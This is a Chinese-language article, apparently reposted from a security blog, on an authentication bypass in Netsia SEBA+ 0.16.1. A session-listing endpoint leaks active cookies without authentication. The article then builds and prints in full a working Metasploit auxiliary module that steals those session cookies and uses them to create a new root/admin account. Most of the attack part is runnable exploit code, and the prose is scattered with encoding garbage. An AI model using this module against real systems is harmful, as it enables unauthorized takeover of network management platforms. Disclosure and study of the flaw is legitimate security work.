Netsia-SEBA認(rèn)證繞過漏洞的示例分析
小編給大家分享一下Netsia-SEBA認(rèn)證繞過漏洞的示例分析���,相信大部分人都還不怎么了解�,因此分享這篇文章給大家參考一下�,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧��!
漏洞分析
不幸的是��,由于我無法訪問到產(chǎn)品的源代碼,因此我無法跟大家詳細(xì)描述該漏洞的原始成因���。
在應(yīng)用程序中�����,對(duì)““Active Sessions”部分HTTP請(qǐng)求可以由root/admin用戶訪問�,而不需要任何會(huì)話(cookie)信息���。因此�,我們就可以從響應(yīng)中讀取應(yīng)用程序中活動(dòng)用戶的會(huì)話cookie信息內(nèi)容��。
需要注意的是���,我們無法在應(yīng)用程序的其他地方發(fā)送類似的請(qǐng)求����。換句話說�,我們只能在“Active Sessions”這里才能夠在沒有會(huì)話信息的情況下發(fā)送這種請(qǐng)求��。
通過執(zhí)行“GET /session/list/allActiveSession”請(qǐng)求,我們可以通過獲取響應(yīng)返回的會(huì)話信息來獲取授權(quán)用戶的cookie值���。
此時(shí)�,我們手上是有一個(gè)cookie值的�,但會(huì)話很可能馬上就結(jié)束了�。所以最好的攻擊向量就是創(chuàng)建一個(gè)新用戶。
因此��,我們可以在“POST /authentication server/user/add”字段中附帶請(qǐng)求所必須的數(shù)據(jù)來向應(yīng)用程序添加一個(gè)新的root用戶���。
在上圖所執(zhí)行的攻擊中���,在獲得登錄用戶的cookie值后,未經(jīng)授權(quán)的攻擊者可以通過將此cookie值放置在用戶添加請(qǐng)求中來創(chuàng)建具有完整權(quán)限的新用戶���,具體如下圖所示:
如上圖所示���,HTTP響應(yīng)表明請(qǐng)求的用戶已成功添加。稍后����,攻擊者可以輕松地使用這個(gè)具有完整權(quán)限的用戶登錄到應(yīng)用程序并執(zhí)行所有其他操作。
漏洞利用高級(jí)開發(fā)(MSF:Auxiliary)
關(guān)于Auxiliary模塊
Metasploit框架包括數(shù)百個(gè)執(zhí)行掃描,模糊(漏洞檢查)��,嗅探等輔助模塊����。 雖然這些模塊不會(huì)給你一個(gè)外殼����,但它們?cè)谶M(jìn)行滲透測(cè)試時(shí)非常有價(jià)值?��!皊how auxiliary”可以顯示所有的輔助模塊:
漏洞利用模塊通常是為在系統(tǒng)上執(zhí)行命令而編寫的����,而MSF的Auxiliary適用于各種常見類型的漏洞��,比如說從目標(biāo)主機(jī)獲取信息����,或利用目標(biāo)主機(jī)中的現(xiàn)有漏洞來創(chuàng)建新的攻擊向量��。
因此�����,我們可以利用MSF的Auxiliary模塊來對(duì)這個(gè)漏洞進(jìn)行利用設(shè)計(jì)���。
class MetasploitModule < Msf::Auxiliary
此時(shí)不會(huì)生成Payload,因?yàn)槲覀儧]有選擇Msf::Exploit::Remote����。
接下來����,我們將分配用戶名和密碼作為注冊(cè)選項(xiàng)。這里使用的是Rex::Text.rand_text_alphanumeric()函數(shù)來生成密碼隨機(jī)值����,該功能可以為漏洞利用提供便利�����。
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username for your new account']),
OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
])接下來���,請(qǐng)求“/session/list/allActiveSession”���,并根據(jù)響應(yīng)進(jìn)行檢查。如果響應(yīng)中包含“sessionId”���,則表示存在活動(dòng)會(huì)話���。如果沒有“sessionId”且包含“SUCCESS”,則表示應(yīng)用程序易受攻擊���,但沒有活動(dòng)會(huì)話����。
def check
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? 'sessionId'
return Exploit::CheckCode::Vulnerable
else
if res.code == 200 and res.body.include? 'SUCCESS'
print_status("Target is vulnerable! But active admin session was not found. Try again later.")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
End如上所述的檢查模塊就足以完成該過程�,我們不需要讓Auxiliary去運(yùn)行不必要的檢測(cè),因?yàn)槿绻繕?biāo)不存在漏洞��,則執(zhí)行其他操作毫無意義�。
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
End
接下來�,我們就可以開始編寫漏洞利用代碼了。
首先���,我們需要了解Netsia SEBA+應(yīng)用程序中有多少活動(dòng)會(huì)話����。因?yàn)榭梢杂卸鄠€(gè)用戶處于活動(dòng)狀態(tài),其中一些可能不是授權(quán)用戶���,而我們需要使用權(quán)限最高的活躍用戶來進(jìn)行攻擊��。因此����,我決定創(chuàng)建一個(gè)單獨(dú)的計(jì)數(shù)方法��。
def count_user(data, find_string)
data.scan(/(?=#{find_string})/).count
End我們將把HTTP響應(yīng)指定為數(shù)據(jù),并且查找字符串“sessionId”��。這樣一來�����,返回的響應(yīng)中“sessionId”的數(shù)量就意味著有同樣多的用戶處于活動(dòng)狀態(tài)��,稍后我們還需要提取這些sessionId值����。
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body,'"name"')
print_good("Currently #{sescount} active sessions have been detected.")以上部分完成了第一步操作���,接下來需要提取sessionId值。
“sessionId”:“和”“action”之間的部分是sessionId在響應(yīng)中的值�����,我們可以使用scan ()函數(shù)來搜索正則表達(dá)式([\S\s]*?)來實(shí)現(xiàn)我們的目標(biāo)����。
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
在上述過程中,cookies[0]將是第一個(gè)用戶的sessionId值���,而cookies[1]則是第二個(gè)用戶的sessionId值���,此時(shí)計(jì)數(shù)+1。
現(xiàn)在��,我們將應(yīng)用一個(gè)非常簡(jiǎn)單的向量來進(jìn)行開發(fā)���。
我們將發(fā)送一個(gè)包含所有活動(dòng)cookie值的用戶創(chuàng)建請(qǐng)求��,無論這些cookie中的哪一個(gè)被授權(quán)�����,它都將在我們想要的用戶數(shù)據(jù)庫(kù)中創(chuàng)建新用戶����。
在這里我選擇使用while循環(huán)。例如�����,有7個(gè)活動(dòng)用戶���,而這個(gè)循環(huán)將為cookies[int]變量中的值加上+1��,并發(fā)出各種可能的請(qǐng)求�����。
while $i <= sescount do
sessloop = cookies[$i]
sessid = "SESSION=" + sessloop.to_s
cookie = sessid.split('"]').join('').split('["').join('')
$i +=1
json_data=[........]
res = send_request_raw({
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
'cookie' => cookie,
'data' => json_data
})
End像上面這樣的循環(huán)對(duì)于這個(gè)向量就足夠了。最后�����,我們需要檢查請(qǐng)求是否成功���。
如果創(chuàng)建了所需的用戶��,它將提供信息并返回新創(chuàng)建的用戶信息��。
if res.code == 200 and res.body.include? '"SUCCESS"'
print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
break
End漏洞利用實(shí)踐
Auxiliary模塊現(xiàn)在已完成����,接下來我們將所有內(nèi)容整合在一起:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,
'Description' => %q{
This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
can be performed without the need for any session(cookie) information.
Therefore, the session cookie informations of the active users in the application can be read from the response content.
A new authorized user can be created with the obtained cookie.
},
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
[ 'URL', 'https://www.netsia.com' ]
],
'Author' =>
[
'?zkan Mustafa AKKU? ' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "2021-01-06",
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username for your new account']),
OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
])
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def check
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? 'sessionId'
return Exploit::CheckCode::Vulnerable
else
if res.code == 200 and res.body.include? 'SUCCESS'
print_status("Target is vulnerable! But active admin session was not found. Try again later.")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
def count_user(data, find_string)
data.scan(/(?=#{find_string})/).count
end
def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body,'"name"')
print_good("Currently #{sescount} active sessions have been detected.")
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
puts cookies
$i = 0
while $i <= sescount do
sessloop = cookies[$i]
sessid = "SESSION=" + sessloop.to_s
cookie = sessid.split('"]').join('').split('["').join('')
$i +=1
json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}'
res = send_request_raw({
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
'cookie' => cookie,
'data' => json_data
})
if res.code == 200 and res.body.include? '"SUCCESS"'
print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
break
end
end
end
end接下來,我們就可以使用Auxiliary模塊來進(jìn)行漏洞利用了:
漏洞修復(fù)
Netsia現(xiàn)已修復(fù)了這個(gè)漏洞�,如果沒有授權(quán)的cookie,則無法再發(fā)送此請(qǐng)求����。即使您是授權(quán)的管理員用戶,也會(huì)看到會(huì)話cookies被過濾掉���。
以上是“Netsia-SEBA認(rèn)證繞過漏洞的示例分析”這篇文章的所有內(nèi)容��,感謝各位的閱讀����!相信大家都有了一定的了解��,希望分享的內(nèi)容對(duì)大家有所幫助�����,如果還想學(xué)習(xí)更多知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道����!
